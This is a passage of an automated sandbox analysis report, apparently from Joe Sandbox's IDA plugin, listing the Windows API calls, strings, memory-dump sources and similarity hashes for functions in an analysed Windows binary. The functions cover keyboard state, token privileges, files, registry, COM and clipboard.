MapVirtualKeyW.USER32(00000012,00000000), ref: 00FCD6E7
keybd_event.USER32(00000012,00000000), ref: 00FCD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FCD6FC
keybd_event.USER32(00000012,00000000), ref: 00FCD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FCD70A
keybd_event.USER32(00000012,00000000), ref: 00FCD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FCD719
keybd_event.USER32(00000012,00000000), ref: 00FCD71E
SetForegroundWindow.USER32(?), ref: 00FCD721
AttachThreadInput.USER32(?,?,00000000), ref: 00FCD748

Strings

Shell_TrayWnd, xrefs: 00FCD660

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 98c9f30c7416a17e0424772f3c8678e533db5f1ccec60bf7332cc5baae0ed2c6
Instruction ID: 013d39b3d26b53419a4b5c9e2f700c07c6a53c2c8553715856af6562e7057f36
Opcode Fuzzy Hash: 98c9f30c7416a17e0424772f3c8678e533db5f1ccec60bf7332cc5baae0ed2c6
Instruction Fuzzy Hash: 6C315571A403197BEB305FA19C4AF7F7E6CEB44B60F104029FA04EA1C1D6B95901ABA1

Function 00FE8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00FE87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FE882B
Part of subcall function 00FE87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FE8858
Part of subcall function 00FE87E1: GetLastError.KERNEL32 ref: 00FE8865

_memset.LIBCMT ref: 00FE8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FE83A5
CloseHandle.KERNEL32(?), ref: 00FE83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FE83CD
GetProcessWindowStation.USER32 ref: 00FE83E6
SetProcessWindowStation.USER32(00000000), ref: 00FE83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FE840A

Part of subcall function 00FE81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FE8309), ref: 00FE81E0
Part of subcall function 00FE81CB: CloseHandle.KERNEL32(?,?,00FE8309), ref: 00FE81F2

Strings

winsta0, xrefs: 00FE83C8
default, xrefs: 00FE8405
, xrefs: 00FE8362

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 2f66bd5b55a638163c3d8e7d9da5243a8d5a66dd0495556a33fe762df671e8d7
Instruction ID: 2e809cb817feea119f0c2279013470da71103af8f31ba71a5d1530c3e6f75a4f
Opcode Fuzzy Hash: 2f66bd5b55a638163c3d8e7d9da5243a8d5a66dd0495556a33fe762df671e8d7
Instruction Fuzzy Hash: 87818C71D00289AFDF11EFA5CC45AEE7B78FF08364F184159F919A6160DB398E16EB20

Function 00FFC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FFC78D
FindClose.KERNEL32(00000000), ref: 00FFC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FFC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FFC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00FFC844
__swprintf.LIBCMT ref: 00FFC890
__swprintf.LIBCMT ref: 00FFC8D3

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

__swprintf.LIBCMT ref: 00FFC927

Part of subcall function 00FB3698: __woutput_l.LIBCMT ref: 00FB36F1

__swprintf.LIBCMT ref: 00FFC975

Part of subcall function 00FB3698: __flsbuf.LIBCMT ref: 00FB3713
Part of subcall function 00FB3698: __flsbuf.LIBCMT ref: 00FB372B

__swprintf.LIBCMT ref: 00FFC9C4
__swprintf.LIBCMT ref: 00FFCA13
__swprintf.LIBCMT ref: 00FFCA62

Strings

%02d, xrefs: 00FFC91B, 00FFC925, 00FFC973, 00FFC9C2, 00FFCA11, 00FFCA60
%4d%02d%02d%02d%02d%02d, xrefs: 00FFC88A
%4d, xrefs: 00FFC8CD

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 3c88469a2cf5bd450aa21bd392fe85a2233c29cd19a2048a991d9736907ec9da
Instruction ID: 8223dd46aa106020ba9e84b9b1883878ab8d28598a18018e342faf20d255a5e3
Opcode Fuzzy Hash: 3c88469a2cf5bd450aa21bd392fe85a2233c29cd19a2048a991d9736907ec9da
Instruction Fuzzy Hash: D1A13CB1408305ABDB11EFA5CC86DAFB7ECEF99700F40091DF585C6151EA79EA08DB62

Function 00FFEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00FFEFB6
_wcscmp.LIBCMT ref: 00FFEFCB
_wcscmp.LIBCMT ref: 00FFEFE2
GetFileAttributesW.KERNEL32(?), ref: 00FFEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00FFF00E
FindNextFileW.KERNEL32(00000000,?), ref: 00FFF026
FindClose.KERNEL32(00000000), ref: 00FFF031
FindFirstFileW.KERNEL32(*.*,?), ref: 00FFF04D
_wcscmp.LIBCMT ref: 00FFF074
_wcscmp.LIBCMT ref: 00FFF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00FFF09D
SetCurrentDirectoryW.KERNEL32(01048920), ref: 00FFF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FFF0C5
FindClose.KERNEL32(00000000), ref: 00FFF0D2
FindClose.KERNEL32(00000000), ref: 00FFF0E4

Strings

*.*, xrefs: 00FFF048

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: d907ce548a2ce0abc9ef08934ab64649be325129ccb755b2309b30fb52a819ed
Instruction ID: 8cca3ee95f068e459582005087b59ab1186a65d66bf11143a057649c44dc703e
Opcode Fuzzy Hash: d907ce548a2ce0abc9ef08934ab64649be325129ccb755b2309b30fb52a819ed
Instruction Fuzzy Hash: 5131E53290020E7BDB24DAA5DC48AEE77AC9F44360F144166E944E20A1EF79DE48EB51

Function 01010857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01010953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0101F910,00000000,?,00000000,?,?), ref: 010109C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01010A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01010A92
RegCloseKey.ADVAPI32(?), ref: 01010DB2
RegCloseKey.ADVAPI32(00000000), ref: 01010DBF

Strings

REG_MULTI_SZ, xrefs: 01010B7A
REG_SZ, xrefs: 01010AD0
REG_EXPAND_SZ, xrefs: 01010A2F
REG_DWORD, xrefs: 01010C83
REG_QWORD, xrefs: 01010D00
REG_BINARY, xrefs: 01010D4D

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 386347e90ff3e09859566fdd288d340d3d5a6cf9f795993415f7bee2f794ca9b
Instruction ID: 3917bf50e1a60d20b2a876cec665e791be298a2d434f9151a2b55497ba74f2e4
Opcode Fuzzy Hash: 386347e90ff3e09859566fdd288d340d3d5a6cf9f795993415f7bee2f794ca9b
Instruction Fuzzy Hash: D202AB756046019FDB54EF28C881E2AB7E5FF89324F05845CF88A9B366DB38ED45CB81

Function 00FFF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00FFF113
_wcscmp.LIBCMT ref: 00FFF128
_wcscmp.LIBCMT ref: 00FFF13F

Part of subcall function 00FF4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FF43A0

FindNextFileW.KERNEL32(00000000,?), ref: 00FFF16E
FindClose.KERNEL32(00000000), ref: 00FFF179
FindFirstFileW.KERNEL32(*.*,?), ref: 00FFF195
_wcscmp.LIBCMT ref: 00FFF1BC
_wcscmp.LIBCMT ref: 00FFF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00FFF1E5
SetCurrentDirectoryW.KERNEL32(01048920), ref: 00FFF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FFF20D
FindClose.KERNEL32(00000000), ref: 00FFF21A
FindClose.KERNEL32(00000000), ref: 00FFF22C

Strings

*.*, xrefs: 00FFF190

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 78f1bdaaaa945c7b4dc7b8e3ee5a86a8a9ca67445e2e311b804340095342507e
Instruction ID: 765be931eed324b033c92c2574c17948f95ab3d50e6a3a84a1c6ea000817d092
Opcode Fuzzy Hash: 78f1bdaaaa945c7b4dc7b8e3ee5a86a8a9ca67445e2e311b804340095342507e
Instruction Fuzzy Hash: 7C31053690061E7ADB20EEA0EC48AEE77AC9F45370F1441A5E940E21A0DB79DE49EF54

Function 00FFA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FFA20F
__swprintf.LIBCMT ref: 00FFA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00FFA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FFA293
_memset.LIBCMT ref: 00FFA2B2
_wcsncpy.LIBCMT ref: 00FFA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FFA323
CloseHandle.KERNEL32(00000000), ref: 00FFA32E
RemoveDirectoryW.KERNEL32(?), ref: 00FFA337
CloseHandle.KERNEL32(00000000), ref: 00FFA341

Strings

\, xrefs: 00FFA247
:, xrefs: 00FFA252
\??\%s, xrefs: 00FFA22B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 48364dbd0a3ab87ad01885fedfdf31824c6a7978d128e2bfe093266f2e1f26ff
Instruction ID: a0f6793156c2cd13863ede1169085f8fbf2121ef0574592e42743099d906c3bf
Opcode Fuzzy Hash: 48364dbd0a3ab87ad01885fedfdf31824c6a7978d128e2bfe093266f2e1f26ff
Instruction Fuzzy Hash: BC31D4B190010AABDB20DFA0DC49FFB37BCEF89750F1041B6FA08D2160E77996449B25

Function 00FE7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FE821E
Part of subcall function 00FE8202: GetLastError.KERNEL32(?,00FE7CE2,?,?,?), ref: 00FE8228
Part of subcall function 00FE8202: GetProcessHeap.KERNEL32(00000008,?,?,00FE7CE2,?,?,?), ref: 00FE8237
Part of subcall function 00FE8202: HeapAlloc.KERNEL32(00000000,?,00FE7CE2,?,?,?), ref: 00FE823E
Part of subcall function 00FE8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FE8255

Part of subcall function 00FE829F: GetProcessHeap.KERNEL32(00000008,00FE7CF8,00000000,00000000,?,00FE7CF8,?), ref: 00FE82AB
Part of subcall function 00FE829F: HeapAlloc.KERNEL32(00000000,?,00FE7CF8,?), ref: 00FE82B2
Part of subcall function 00FE829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FE7CF8,?), ref: 00FE82C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FE7D13
_memset.LIBCMT ref: 00FE7D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FE7D47
GetLengthSid.ADVAPI32(?), ref: 00FE7D58
GetAce.ADVAPI32(?,00000000,?), ref: 00FE7D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FE7DB1
GetLengthSid.ADVAPI32(?), ref: 00FE7DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FE7DDD
HeapAlloc.KERNEL32(00000000), ref: 00FE7DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FE7E05
CopySid.ADVAPI32(00000000), ref: 00FE7E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FE7E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FE7E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FE7E77

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: edb737e2ed0da32b0bc0797554059b38d4ee1e292fbeb538035bd8ee71b5d69d
Instruction ID: b9648694b66a064a839d42e6e2a3b262dfcb9c872a8a0cf78589efb05ff8a1df
Opcode Fuzzy Hash: edb737e2ed0da32b0bc0797554059b38d4ee1e292fbeb538035bd8ee71b5d69d
Instruction Fuzzy Hash: B2616D7190024AAFDF11EFA1DC44AEEBBB9FF04310F048259F955A7280DB399E05DB60

Function 00FA66E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

BSR_UNICODE), xrefs: 00FE1338
CRLF), xrefs: 00FE12C1
LIMIT_RECURSION=, xrefs: 00FE11FC
UTF), xrefs: 00FE10FA
NO_START_OPT), xrefs: 00FE114F
LIMIT_MATCH=, xrefs: 00FE1170
CR), xrefs: 00FE1287
ANYCRLF), xrefs: 00FE12FB
UCP), xrefs: 00FE110D
BSR_ANYCRLF), xrefs: 00FE131E
LF), xrefs: 00FE12A4
UTF16), xrefs: 00FE10CF
NO_AUTO_POSSESS), xrefs: 00FE112E
ANY), xrefs: 00FE12DE

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 2a582847b337ed47a2ca195330526bc0436862c58f35ac6132fa6b5e6422a1bd
Instruction ID: 1a3a1d109daf15b2a78c88fbd96d83a894a94cbd330e0bfc4d228674cea05c68
Opcode Fuzzy Hash: 2a582847b337ed47a2ca195330526bc0436862c58f35ac6132fa6b5e6422a1bd
Instruction Fuzzy Hash: 967293B5E00259CBDF24CF5AC8807AEB7B5FF49320F14816AE845EB290DB349D41EB90

Function 00FF001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00FF0097
SetKeyboardState.USER32(?), ref: 00FF0102
GetAsyncKeyState.USER32(000000A0), ref: 00FF0122
GetKeyState.USER32(000000A0), ref: 00FF0139
GetAsyncKeyState.USER32(000000A1), ref: 00FF0168
GetKeyState.USER32(000000A1), ref: 00FF0179
GetAsyncKeyState.USER32(00000011), ref: 00FF01A5
GetKeyState.USER32(00000011), ref: 00FF01B3
GetAsyncKeyState.USER32(00000012), ref: 00FF01DC
GetKeyState.USER32(00000012), ref: 00FF01EA
GetAsyncKeyState.USER32(0000005B), ref: 00FF0213
GetKeyState.USER32(0000005B), ref: 00FF0221

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 4787bbd232433c33e3c2f0353a27ba10bd313d8dc4233f1ba8680c90875dcf39
Instruction ID: 2cbc60ae9f1b1e5b49e0d045b2bb8196d766b412e2ff7deeb06d82a0fd336a96
Opcode Fuzzy Hash: 4787bbd232433c33e3c2f0353a27ba10bd313d8dc4233f1ba8680c90875dcf39
Instruction Fuzzy Hash: EC51E730D0478C29FB35DBA089547BABFB49F01390F08459A97C2561D3DEA89B8CE761

Function 010103DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01010E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0100FDAD,?,?), ref: 01010E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010104AC

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0101054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 010105E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01010822
RegCloseKey.ADVAPI32(00000000), ref: 0101082F

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 59b999b60a6ed9094cad2d3fdfcdffb7291470ef8507d98ee0c5baa164ec7d88
Instruction ID: 8579c2221e9a46423867f29d41432fc3e61953112b521fa5598bce7418199eb0
Opcode Fuzzy Hash: 59b999b60a6ed9094cad2d3fdfcdffb7291470ef8507d98ee0c5baa164ec7d88
Instruction Fuzzy Hash: E2E17070604204AFDB15DF28C885E2BBBE4FF89314F04896DF889DB265DB39E945CB91

Function 010083BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

CoInitialize.OLE32 ref: 01008403
CoUninitialize.OLE32 ref: 0100840E
CoCreateInstance.OLE32(?,00000000,00000017,01022BEC,?), ref: 0100846E
IIDFromString.OLE32(?,?), ref: 010084E1
VariantInit.OLEAUT32(?), ref: 0100857B
VariantClear.OLEAUT32(?), ref: 010085DC

Strings

Failed to create object, xrefs: 01008479, 0100852F
Invalid parameter, xrefs: 010084FA
NULL Pointer assignment, xrefs: 010084B3

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 867d67ac239ebc92e4265d84b6f8abb8932ea3f1bba1d33965e736f99eba90d5
Instruction ID: c5955d10366c56a642df55483b5b4473af570e6d2d3ddacb12c83da6bf555730
Opcode Fuzzy Hash: 867d67ac239ebc92e4265d84b6f8abb8932ea3f1bba1d33965e736f99eba90d5
Instruction Fuzzy Hash: 4361CF70A083119FE712DF18C848B5EBBE8BF45714F04845EF9C19B291CB75E948CB92

Function 01004164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0100418B
EmptyClipboard.USER32 ref: 01004191
GlobalAlloc.KERNEL32(00000002,?), ref: 010041A6
CloseClipboard.USER32 ref: 01004245

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: c67d9b1bc7819fc8187fcc46b5a6a41611c5d5dc66af3fc7cf66d3b77a934227
Instruction ID: 1f767bab4ed993789f946a4d55c7b059018fcf80de2e3cde8ff6090667a38904
Opcode Fuzzy Hash: c67d9b1bc7819fc8187fcc46b5a6a41611c5d5dc66af3fc7cf66d3b77a934227
